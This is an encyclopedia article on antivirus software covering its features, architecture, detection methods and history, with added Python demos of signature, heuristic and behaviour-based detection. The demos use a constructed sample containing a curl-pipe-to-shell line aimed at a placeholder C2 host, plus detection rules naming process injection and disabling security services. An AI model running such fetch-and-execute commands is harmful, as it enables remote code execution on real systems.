Antivirus Software

Malicious software, or malware, is code that can harm computer systems and steal personal information, causing damage such as financial loss. Malware can enter a system in many ways: as an email attachment, on a USB drive, or when a user visits an infected website or clicks a malicious link.

Antivirus software is a program that protects computer systems from malicious software. To do this it needs privileged access to the system. Most antivirus software provides real-time protection against harmful applications; users can also run security scans manually.

It's advisable to use antivirus programs on desktops. On mobile phones they can be optional, provided users don't install apps from unofficial sources or click suspicious links.

Discussion

  • What are the features of antivirus software?

    Below are some common features of antivirus software:

    • Real-time scanning: Security checks performed continuously while the system is in use, rather than only during a scheduled scan.
    • Quarantine: An isolated location where harmful files are kept so they can't execute or be opened by mistake.
    • Bank mode: A clean, isolated virtual environment within the desktop session, intended for online banking and payments.
    • Ransomware Shield: Protects personal photos, documents and other files from being modified, deleted or encrypted by ransomware.
    • Remote Access Shield: Protects the computer from remote, unauthorized access.
    • Sandbox: A system in which suspicious files are executed and analysed inside a virtual machine to detect malware.
    • Hack alerts: Warns if sensitive data is found leaked on the Dark Web or other online sources.
    • Password protection: Protects passwords stored in web browsers.
    • Webcam shield: Prevents applications and malware from gaining unauthorized access to the webcam.
    • IP address masking: Hides the IP address while browsing the internet.
    • Freemium vs paid versions: Free versions provide basic features; paid versions add more.
  • What are the types of antivirus programs?

    Standalone antivirus software is specialized to scan for and remove particular viruses. It can easily be carried on a USB drive from one machine to another. These programs do not provide real-time protection. Windows Defender Offline, Metascan Client and Microsoft Safety Scanner are some examples.

    Security software suites provide more features than plain antivirus software. They not only scan for and remove viruses but also protect against other malicious attacks, aiming at complete protection of the user's computer. Extra features include anti-spyware, a firewall, site authentication and parental controls. Bitdefender Total Security, Norton 360 Deluxe and Kaspersky Total Security are examples.

    Cloud-based antivirus software analyses files in the cloud instead of on the user's system. It has two parts: (a) a client installed on the user's system; (b) a cloud service that receives the data gathered by the client and runs the scans. This saves memory and processing resources on the user's computer.

  • What's the architecture of antivirus software?
    Architecture of signature-based antivirus. Source: Madhavi 2022.

    Antivirus software consists of four main components: the Anti-virus Manager, the Anti-virus Engine, the Malware Signature Database and the Anti-virus Driver.

    The Anti-virus Manager handles overall management. It's responsible for launching malware scans, reviewing the results of malware removal and restoration, raising alarms, and setting the periodic scan policy. It also updates the Malware Signature DB and the Anti-virus Engine.

    The Anti-virus Engine is responsible for handling malware found on the system. It analyses a file's information and marks it safe or harmful based on the scan.

    The Malware Signature Database stores signatures of known malware. The engine evaluates a suspicious file by comparing its characteristics against these signatures.

    The Anti-virus Driver is the real-time monitoring function at the point where malware enters the system: it intercepts file input and output, resolves the exact file path to check, and revokes access to files found to be infected.
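    The interaction between these four components, as an added example that is not part of the original page or of any vendor's code: a small Python model in which the Driver intercepts a file open, the Engine consults the Signature DB, and the Manager quarantines the file and raises an alarm. The file contents, the whole-file hash and the byte-pattern signature are constructed for the demo; XOR-masking quarantined files and writing a `.meta` record beside them are design choices made here, not an industry standard.

```python
"""Toy model of the four-component antivirus architecture described above
(Manager, Engine, Signature DB, Driver). Added example, not the design of any
real product; the sample files, hashes and byte patterns are constructed."""
import hashlib
import tempfile
from pathlib import Path


class SignatureDB:
    """Malware Signature Database: known-bad SHA-256 digests and byte patterns."""
    def __init__(self):
        self.hashes, self.patterns = set(), {}   # patterns: signature name -> bytes

    def update(self, hashes=(), patterns=None):
        self.hashes.update(hashes)
        self.patterns.update(patterns or {})


class Engine:
    """Anti-virus Engine: marks a file safe or harmful by consulting the DB."""
    def __init__(self, db):
        self.db = db

    def scan(self, path):
        data = path.read_bytes()
        digest = hashlib.sha256(data).hexdigest()
        if digest in self.db.hashes:
            return "harmful", "hash:" + digest[:12]
        for name, pattern in self.db.patterns.items():
            if pattern in data:
                return "harmful", "pattern:" + name
        return "safe", None


class Manager:
    """Anti-virus Manager: scheduled scans, quarantine, alarms, signature updates."""
    def __init__(self, db, engine, quarantine_dir):
        self.db, self.engine, self.qdir = db, engine, quarantine_dir
        self.alarms = []

    def update_signatures(self, hashes=(), patterns=None):
        self.db.update(hashes, patterns)   # the engine reads this same DB object

    def quarantine(self, path, reason):
        # Keep the file under its hash, XOR-masked so the stored copy can't run and
        # won't re-trigger an on-access scan; record where it came from and why.
        data = path.read_bytes()
        name = hashlib.sha256(data).hexdigest()
        (self.qdir / name).write_bytes(bytes(b ^ 0xFF for b in data))
        (self.qdir / (name + ".meta")).write_text(f"{path}\t{reason}\n")
        path.unlink()
        self.alarms.append((path.name, reason))   # raise an alarm
        return name

    def scheduled_scan(self, root):
        results = {}
        for p in sorted(root.rglob("*")):
            if p.is_file():
                verdict, reason = self.engine.scan(p)
                if verdict == "harmful":
                    self.quarantine(p, reason)
                results[p.name] = verdict
        return results


class Driver:
    """Anti-virus Driver: on-access hook; scans before granting access, revokes it if infected."""
    def __init__(self, engine, manager):
        self.engine, self.manager = engine, manager

    def open(self, path):
        verdict, reason = self.engine.scan(path)
        if verdict == "harmful":
            self.manager.quarantine(path, reason)
            raise PermissionError(f"access to {path.name} revoked: {reason}")
        return path.read_bytes()


def demo():
    """Creates constructed sample files, exercises both scan paths, returns what happened."""
    root = Path(tempfile.mkdtemp(prefix="av_files_"))
    qdir = Path(tempfile.mkdtemp(prefix="av_quarantine_"))
    known_bad = b"#!/bin/sh\ncurl http://c2.example.invalid/x | sh\n"   # constructed
    (root / "notes.txt").write_bytes(b"quarterly report draft")
    (root / "dropper.bin").write_bytes(b"MZ\x90\x00...DEMO-PAYLOAD-MARKER...")
    (root / "installer.sh").write_bytes(known_bad)
    db = SignatureDB()
    engine = Engine(db)
    manager = Manager(db, engine, qdir)
    driver = Driver(engine, manager)
    manager.update_signatures(hashes={hashlib.sha256(known_bad).hexdigest()},
                              patterns={"Demo.Dropper": b"DEMO-PAYLOAD-MARKER"})
    out = {"notes.txt": "allowed" if driver.open(root / "notes.txt") else "blocked"}
    try:
        driver.open(root / "dropper.bin")
        out["dropper.bin"] = "allowed"
    except PermissionError:
        out["dropper.bin"] = "blocked"
    out["scan"] = manager.scheduled_scan(root)   # dropper.bin is already quarantined
    out["alarms"] = len(manager.alarms)
    return out
```

    Calling `demo()` shows the two entry points: the Driver blocks `dropper.bin` the moment something tries to open it, while the Manager's scheduled scan later finds `installer.sh` by hash. Both paths end in the same quarantine routine, which is why the Manager, not the Driver, owns it.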

  • What are the major virus detection methods used by antivirus software?

    There are two main detection techniques used by antivirus programs: signature-based detection and heuristic-based detection.

    In signature-based detection, the antivirus scans files and compares them with the predefined malicious patterns in its database. A signature can be a file hash, a known byte sequence, a malicious domain, the content of an email subject line, or a pattern of malicious network behaviour. If a file matches a signature, it's flagged as malware and the configured action is taken. The weakness is that signature matching can't detect new malware, or even a modified variant of known malware, until a signature for it is added to the definition file. With the rapid growth in malware variants, this method alone becomes ineffective in the long run.

    In heuristic-based detection, the antivirus uses rules, data mining and machine learning techniques to judge an executable file by what it appears designed to do. For instance, it may detect commands that deliver a payload hidden in a Trojan horse or that spread a worm. It can identify new or altered variants of malware even when the database has no signature for them, at the cost of occasional false positives. It's commonly used in combination with signature-based detection.
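    Both techniques side by side, as an added example (not code from the page or from any real engine): a one-byte change to the known sample defeats the byte-sequence signature, while weighted heuristic rules still flag the variant because its intent hasn't changed. The signature database, rule set, weights, threshold and sample files are all constructed for the demo.

```python
"""Signature-based vs heuristic detection, as an added illustration of the two
techniques described above. Not the code of any real engine: the signature
database, heuristic rules, weights and sample files are constructed."""
import hashlib
import math
import re
from collections import Counter

# --- signature database (constructed): exact whole-file hashes and byte sequences
SIGNATURE_HASHES = set()
SIGNATURE_BYTES = {"Demo.Trojan.A": b"\xde\xad\xbe\xef\x00CONNECT-BACK\x00"}


def signature_scan(data):
    """Exact match only: a file not in the DB, or a changed variant, is missed."""
    if hashlib.sha256(data).hexdigest() in SIGNATURE_HASHES:
        return "known-hash"
    for name, seq in SIGNATURE_BYTES.items():
        if seq in data:
            return name
    return None


# --- heuristic rules (constructed): weighted indicators of intent, not exact bytes
HEURISTIC_RULES = [
    ("autostart-registry", re.compile(rb"CurrentVersion\\Run", re.I), 3),
    ("process-injection", re.compile(rb"CreateRemoteThread|WriteProcessMemory"), 3),
    ("disable-security", re.compile(rb"DisableRealtimeMonitoring", re.I), 4),
    ("embedded-url", re.compile(rb"https?://[\w.\-]+"), 1),
]
HEURISTIC_THRESHOLD = 5   # one weak indicator alone (e.g. a URL) must not convict a file


def entropy(data):
    """Shannon entropy in bits per byte; packed or encrypted payloads approach 8."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def heuristic_scan(data):
    score, hits = 0, []
    for name, pattern, weight in HEURISTIC_RULES:
        if pattern.search(data):
            score, hits = score + weight, hits + [name]
    if entropy(data) > 7.0:
        score, hits = score + 2, hits + ["high-entropy"]
    return score, hits


def classify(data):
    """Signature first (cheap, exact), then heuristics for what signatures miss."""
    sig = signature_scan(data)
    if sig:
        return "malware", "signature:" + sig
    score, hits = heuristic_scan(data)
    if score >= HEURISTIC_THRESHOLD:
        return "suspicious", "heuristic:" + ",".join(hits)
    return "clean", None


# Constructed samples: a known trojan, a variant with one byte of the signature
# changed, a benign file that merely contains a URL, and a packed-looking blob.
ORIGINAL = (b"MZ\x90\x00" + b"\xde\xad\xbe\xef\x00CONNECT-BACK\x00"
            + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
            + b"CreateRemoteThread" + b"http://c2.example.invalid/beacon")
VARIANT = ORIGINAL.replace(b"CONNECT-BACK", b"CONNECT_BACK")
BENIGN = b"Setup notes: documentation at https://docs.example.invalid/install"
PACKED = bytes(range(256)) * 4   # entropy 8.0 but no other indicator


def run_samples():
    return {name: classify(data) for name, data in
            [("original", ORIGINAL), ("variant", VARIANT),
             ("benign", BENIGN), ("packed", PACKED)]}
```

    `run_samples()` returns a verdict per sample: the original is caught by signature, the variant only by heuristics (score 7), and both the URL-only benign file and the high-entropy blob stay clean because a single indicator is below the threshold. That threshold is the knob behind the false-positive trade-off mentioned later in the challenges section.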

  • What are other virus detection techniques used by antivirus software?

    Behaviour-based detection judges a file by what its code is designed to do, either by inspecting the code before execution or by monitoring it as it runs. If the file's objective looks suspicious or harmful (such as accessing critical or unrelated files, processes, or internal services) it's flagged as malware. The antivirus calculates a degree of potential danger and takes the required action afterwards. Examples of malicious behaviour include attempts to discover a sandbox environment, disabling security controls, installing rootkits, and registering for autostart.

    A sandbox is a malware detection system that runs any suspicious object in a virtual machine (VM), which is isolated from the real system. If the object performs malicious actions in the VM, the sandbox registers it as malware.

    Cloud-based detection identifies malware by collecting data from host computers and analysing it on the provider's infrastructure instead of locally. The client captures relevant details about the file and the context of its execution and sends them to the cloud engine for processing.
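    Behaviour scoring over a constructed process-event trace, as an added example that is not from the page or from any product: each event is mapped to one of the behaviours listed above, weighted, and summed per process, so a lone autostart entry from an installer stays below the threshold while the full chain crosses it. The event format, action names, weights and threshold are assumptions made for this demo; in a real product the events would come from the kernel driver on the live system or from the instrumented sandbox VM.

```python
"""Behaviour-based detection over a constructed process-event trace, as an
added example (not any vendor's engine). The event format, action names,
weights and threshold are assumptions made for this demo."""
import re
from collections import defaultdict

# Weighted behaviours named in the passage above, plus a ransomware-style pattern.
BEHAVIOUR_WEIGHTS = {"sandbox-probe": 2, "disable-security": 4,
                     "rootkit-install": 5, "autostart": 3, "mass-encrypt": 4}
DANGER_THRESHOLD = 6   # a single indicator (e.g. an installer's autostart entry) is not enough

SANDBOX_ARTIFACTS = re.compile(r"vbox|vmware|qemu|hyperv|sbiedll", re.I)
SECURITY_SERVICES = {"WinDefend", "MsMpEng", "Sense", "wscsvc"}
AUTOSTART_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
EVENT = re.compile(r"^(?P<ts>\S+)\s+pid=(?P<pid>\d+)\s+(?P<action>\w+)\s+(?P<target>.+)$")


def classify_event(action, target):
    """Maps one raw event to a named malicious behaviour, or None if it looks benign."""
    if action in ("file_read", "reg_read", "proc_list") and SANDBOX_ARTIFACTS.search(target):
        return "sandbox-probe"
    if action == "service_stop" and target in SECURITY_SERVICES:
        return "disable-security"
    if action == "driver_load" and not target.lower().startswith(DRIVER_DIR):
        return "rootkit-install"
    if action == "reg_write" and AUTOSTART_KEY.search(target):
        return "autostart"
    return None


def analyse(trace):
    """Scores each process; returns pid -> (verdict, score, evidence)."""
    scores, evidence, rewrites = defaultdict(int), defaultdict(list), defaultdict(int)
    for line in trace.strip().splitlines():
        m = EVENT.match(line)
        if not m:
            continue   # malformed line: skip it, never let the monitor crash on input
        pid, action, target = m["pid"], m["action"], m["target"]
        kind = classify_event(action, target)
        if action == "file_write" and target.lower().endswith(".locked"):
            rewrites[pid] += 1
            if rewrites[pid] == 3:   # third document rewritten under a new extension
                kind = "mass-encrypt"
        if kind:
            scores[pid] += BEHAVIOUR_WEIGHTS[kind]
            evidence[pid].append(kind)
    return {pid: ("malicious" if s >= DANGER_THRESHOLD else "suspicious", s, evidence[pid])
            for pid, s in scores.items()}


# Constructed trace: pid 4242 shows the chain described above; pid 777 is a
# legitimate installer that only registers itself for autostart.
SAMPLE_TRACE = r"""
2024-01-01T10:00:00 pid=4242 file_read C:\Windows\System32\drivers\VBoxGuest.sys
2024-01-01T10:00:01 pid=4242 service_stop WinDefend
2024-01-01T10:00:02 pid=4242 reg_write HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater
2024-01-01T10:00:03 pid=4242 driver_load C:\Users\bob\AppData\Local\Temp\hide.sys
2024-01-01T10:00:04 pid=4242 file_write C:\Users\bob\Documents\a.docx.locked
2024-01-01T10:00:05 pid=4242 file_write C:\Users\bob\Documents\b.docx.locked
2024-01-01T10:00:06 pid=4242 file_write C:\Users\bob\Documents\c.docx.locked
2024-01-01T10:00:10 pid=777 reg_write HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive
2024-01-01T10:00:11 pid=777 file_write C:\Users\bob\Documents\report.docx
this line is garbage and must be ignored
"""
```

    `analyse(SAMPLE_TRACE)` scores pid 4242 at 18 (malicious) with all five behaviours in its evidence list, and pid 777 at 3 (suspicious only), which is the "degree of potential danger" the passage describes. Notice that the ransomware indicator fires only on the third renamed overwrite: counting before acting is what keeps a user renaming one file from tripping it.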

  • What are the differences between server, desktop and mobile antivirus software?

    Most antivirus software is built for desktops, especially Windows, which has the largest user base. Many vendors offer their product at different price points, starting with a free version that offers only basic protection. Free versions often don't protect against malicious email attachments, suspicious website links and other types of attack. Microsoft ships a basic free antivirus with Windows, known as Windows Defender (now called Microsoft Defender).

    Mobile antivirus software differs from desktop antivirus in having less access to, and control over, the host device. Mobile antivirus typically can't access OS files, filter websites, scan memory, or run a real-time protection engine. Android users need antivirus more than iOS users, since iOS has stricter built-in security features.

    A good server antivirus detects a virus before it infects the system. It can also control data transfer between the server and external drives. It defends the information on servers from all kinds of malicious applications and provides security for server subsystems such as email, firewall and proxy.

  • What are the challenges faced with antivirus software?

    One of the biggest complaints about antivirus software is that it slows down the computer. Antivirus loads each time the system boots, which makes booting slower, and without a fast processor and enough memory it can noticeably slow the whole system.

    No antivirus software provides 100% protection from all kinds of cyber threats. Inexperienced users might fall into the false assumption of being completely secure. If the antivirus uses heuristic detection, it might also flag harmless websites and software as malicious (false positives).

    Antivirus software runs at the kernel level of the operating system, with privileged access to all core files of the OS and system. This makes it an attractive target: because it parses untrusted input (every file that arrives on the machine) with high privileges, any bug in its parsers is reachable by an attacker who can simply deliver a file. Leaked documents published in 2015 indicate that the US National Security Agency (NSA) and the UK Government Communications Headquarters (GCHQ) studied and exploited antivirus software in order to spy on users. It's also been noted that popular software such as Acrobat Reader, Microsoft Word or Google Chrome is harder to exploit than 90% of antivirus products.

  • Are there any alternatives to antivirus software?
    The command-line rkhunter scanner, an engine to scan for Linux rootkits, running on Ubuntu. Source: Nanni 2020.

    Below are some alternatives to antivirus software:

    • Network firewall: A firewall blocks unknown programs and processes from reaching the system over the network, but unlike antivirus it doesn't identify or remove malware already present on the system. It protects against malware arriving from other hosts on the network or from the internet.
    • Cloud antivirus: Cloud antivirus offers features like other antivirus programs but relies on the cloud to analyse malware. It's lighter on the local machine because most of the computation happens in the cloud, and because the cloud database is kept up to date it can catch new malware variants sooner. Panda Cloud Antivirus and Immunet are examples.
    • Online scanning: Some antivirus vendors provide websites that offer free scanning of a system, which can be used without installing heavy software locally.
    • Specialized tools: Virus removal tools help remove stubborn infections. Avast Free Anti-Malware, AVG Free Malware Removal Tools and Avira AntiVir Removal Tool are examples.

Milestones

1971

The first known virus, named Creeper, appears. It infects DEC PDP-10 computers running the TENEX operating system. Ray Tomlinson writes a program called Reaper to delete Creeper. Some consider Reaper the first antivirus program, though Reaper is itself a virus written to remove Creeper.

1987

Bernd Fix performs the first documented removal of a computer virus, though there are competing claims for the first antivirus product. John McAfee founds the McAfee company. Peter Paško, Rudolf Hrubý and Miroslav Trnka create the first version of NOD antivirus. The first two heuristic antivirus utilities are released: Flushot Plus by Ross Greenberg and Anti4us by Erwin Lanting.

2000

Rainer Link and Howard Fuhs start the OpenAntivirus Project, the first open-source antivirus engine.

2001
Graphical front-end of ClamTk Antivirus. Source: Linux Mint 2022.

Tomasz Kojm releases the first version of ClamAV, which goes on to become the first open-source antivirus engine to be commercialised.

2005

AV-TEST, an independent German organization, reports 333,425 unique malware samples in its database. For 2007 alone, AV-TEST reports 5,490,960 new unique malware samples.

2008

McAfee Labs adds the industry's first cloud-based anti-malware functionality to its VirusScan antivirus, under the name Artemis.

2010

A faulty update to the AVG antivirus suite damages 64-bit Windows 7 installations, leaving them unable to boot because of an endless boot loop. This highlights the risk inherent in the privileged access antivirus programs hold when updates aren't properly tested.

2011

Microsoft Security Essentials (MSE) flags the Google Chrome web browser, a rival to Microsoft's own Internet Explorer, as the Zbot banking trojan and removes it. In 2017, Google Play Protect on the Moto G4 flags a Bluetooth system app as malware, disabling Bluetooth for all apps. In 2022, Microsoft Defender flags Chromium-based web browsers and Electron-based apps (WhatsApp, Discord, Spotify) as a severe threat. These are examples of false positives.

References

  1. AVG. 2022. "Remote Access Shield." AVG. Accessed 2022-12-20.
  2. Avast. 2022. "Quarantine - Getting Started." Avast. Updated 2022-06-02. Accessed 2022-12-20.
  3. Avast. 2022b. "Avast Secure Browser Bank Mode - Getting Started." Avast. Updated 2022-06-02. Accessed 2022-12-20.
  4. Avast. 2022c. "Password Protection - Getting Started." Updated 2022-06-02. Accessed 2022-12-20.
  5. Avast. 2022d. "Webcam Shield - FAQs." Avast. Updated 2022-06-02. Accessed 2022-12-20.
  6. Avast Business. 2022. "Ransomware Shield." Avast Business. Accessed 2022-12-20.
  7. Avast Business. 2022b. "Hack Alerts for Android." Avast Business. Accessed 2022-12-20.
  8. Bazrafshan, Z., H. Hashemi, S. M. H. Fard and A. Hamzeh. 2013. "A survey on heuristic malware detection techniques." The 5th Conference on Information and Knowledge Technology, pp. 113-120, May 28-30. doi: 10.1109/IKT.2013.6620049. Accessed 2022-12-20.
  9. Beehler, Eric. 2014. "How mobile antivirus software works and how to know if you need it." TechTarget, March 10. Accessed 2022-12-12.
  10. Belcic, Ivan. 2020. "How do I Hide My IP Address?" Avast, April 08. Updated 2022-10-26. Accessed 2022-12-20.
  11. Belfast Telegraph. 2015. "NSA and GCHQ attacked antivirus software so that they could spy on people, leaks indicate." Belfast Telegraph, June 24. Updated 2022-11-30. Accessed 2022-12-12.
  12. Center for Internet Security. 2022. "Election Security Spotlight – Signature-Based vs Anomaly-Based Detection." Center for Internet Security. Accessed 2022-12-20.
  13. Clementi, Andreas. 2008. "McAfee Artemis." Technology Preview Report, AV-Comparatives, February. Updated 2008-06-03. Accessed 2022-12-19.
  14. Cloonan, John. 2017. "Advanced Malware Detection - Signatures vs. Behavior Analysis." Infosecurity Magazine, April 11. Accessed 2022-12-20.
  15. Comodo Security Solutions. 2022. "How Antivirus Works?" Comodo Security Solutions. Accessed 2022-12-11.
  16. Constantin, Lucian. 2011. "MSE false positive detection forces Google to update Chrome." The Inquirer, October 03. Accessed 2022-12-14.
  17. Das, Ankush. 2022. "What Is Cloud Antivirus and Should You Use It?" MakeUseOf, April 19. Accessed 2022-12-12.
  18. DotNek. 2021. "What is antivirus and its types?" DotNek Software & Mobile Application Development, April 21. Updated 2021-12-14. Accessed 2022-11-29.
  19. Fishman, Andrew, and Morgan Marquis-Boire. 2015. "Popular security software came under relentless NSA and GCHQ attacks." The Intercept, June 22. Accessed 2022-12-12.
  20. Fortinet. 2022. "Heuristic Analysis Definition." Accessed 2022-12-20.
  21. FreeWimaxInfo. 2022. "What are Anti-Virus Servers." FreeWimaxInfo. Accessed 2022-12-17.
  22. Gupta, Harish. 2022. "Anti virus." Lecture notes, Govt. Polytechnic Panchkula. Accessed 2022-12-11.
  23. Han, S.-H., H.-K. Lee, G.-Y. Gim, and S.-J. Kim. 2020. "Empirical Study on Anti-Virus Architecture for Container Platforms." IEEE Access, vol. 8, pp. 134940-134949. doi: 10.1109/ACCESS.2020.3005591. Accessed 2022-12-20.
  24. Kaspersky. 2022. "Sandbox." Kaspersky. Accessed 2022-12-20.
  25. Leyden, John. 2010. "Horror AVG update ballsup bricks Windows 7." The Register, December 02. Accessed 2022-12-25.
  26. Linux Mint. 2022. "ClamTK." Linux Mint. Accessed 2022-12-19.
  27. Madhavi. 2022. "How Antivirus works." Engineers Garage. Accessed 2022-12-25.
  28. Martin, Bob. 2016. "5 Must-Have Features of Antivirus Software." Blog, Great Lakes Computer Corporation, July 21. Accessed 2022-11-29.
  29. McDade, Mirren. 2022. "Top 5 Key Features Of Antivirus Solutions For SMBs." Expert Insights. Updated 2022-01-26. Accessed 2022-11-29.
  30. McGuire, Cecilia. 2014. "Malware and Anti-Virus Architecture." eForensics Magazine, September 04. Accessed 2022-12-11.
  31. Moes, Tibor. 2022. "What is Antivirus Software? The 3 Types You Need to Know." SoftwareLab.org, Momento Ventures Inc. Accessed 2022-11-29.
  32. Nanni, Dan. 2020. "How to scan Linux for rootkits with rkhunter." Xmodulo. Updated 2020-09-24. Accessed 2022-12-19.
  33. National Cyber Security Centre. 2019. "What is an antivirus product? Do I need one?" National Cyber Security Centre, January 21. Accessed 2022-12-11.
  34. Rosencrance, Linda. 2017. "antivirus software (antivirus program)." TechTarget, August 28. Accessed 2022-12-11.
  35. Rubino, Daniel. 2022. "Windows Defender is reporting a false-positive threat 'Behavior:Win32/Hive.ZY'; it's nothing to be worried about." Windows Central, September 05. Accessed 2022-12-14.
  36. Scrivens, Scott. 2017. "If Google Play Protect is breaking bluetooth on your Moto G4 Plus, don't worry because there's a fix." Android Police, September 11. Accessed 2022-12-14.
  37. Sharma, Umakant. 2014. "What is the Importance of Antivirus for Server?" LinkedIn, July 01. Accessed 2022-12-12.
  38. Standard Office Systems. 2020. "How does antivirus work?" Blog, SOS Can Help!, Standard Office Systems, January 09. Accessed 2022-12-11.
  39. Sujith. 2013. "A Brief History of Antivirus Software." TechLineInfo, October 13. Accessed 2022-12-14.
  40. Support.com. 2010. "How Antivirus Software Can Slow Down Your Computer." Support.com, July 26. Updated 2022-11-30. Accessed 2022-12-12.
  41. Taylor, Twain. 2019. "Behavior-based security vs. signature-based security: How they differ." Tech Genix, November 26. Accessed 2022-12-20.
  42. The Virus Encyclopedia. 2022. "Creeper." The Virus Encyclopedia. Accessed 2022-12-19.
  43. Tyagi, Iti. 2012. "Architecture and working of an Antivirus Engine." India study channel, May 05. Accessed 2012-05-05.
  44. Wikipedia. 2022. "Antivirus software." Wikipedia, November 30. Accessed 2022-12-12.
  45. Zeltser, Lenny. 2016. "How Antivirus Software Works: 4 Detection Techniques." Updated 2016-02-10. Accessed 2022-12-20.

Further Reading

  1. Gupta, Harish. 2022. "Anti virus." Lecture notes, Govt. Polytechnic Panchkula. Accessed 2022-12-11.
  2. Tyagi, Iti. 2012. "Architecture and working of an Antivirus Engine." India study channel, May 05. Accessed 2012-05-05.
  3. Standard Office Systems. 2020. "How does antivirus work?" Blog, SOS Can Help!, Standard Office Systems, January 09. Accessed 2022-12-11.
  4. Beehler, Eric. 2014. "How mobile antivirus software works and how to know if you need it." TechTarget, March 10. Accessed 2022-12-12.
  5. Wikipedia. 2022. "Antivirus software." Wikipedia, November 30. Accessed 2022-12-12.

Cite As

Devopedia. 2022. "Antivirus Software." Version 8, December 30. Accessed 2023-11-12. https://devopedia.org/antivirus-software
Contributed by
2 authors


Last updated on
2022-12-30 10:44:11
  • Internet Security
  • Firewall
  • Sandboxing
  • Malware
  • Rootkit
  • Threat Modelling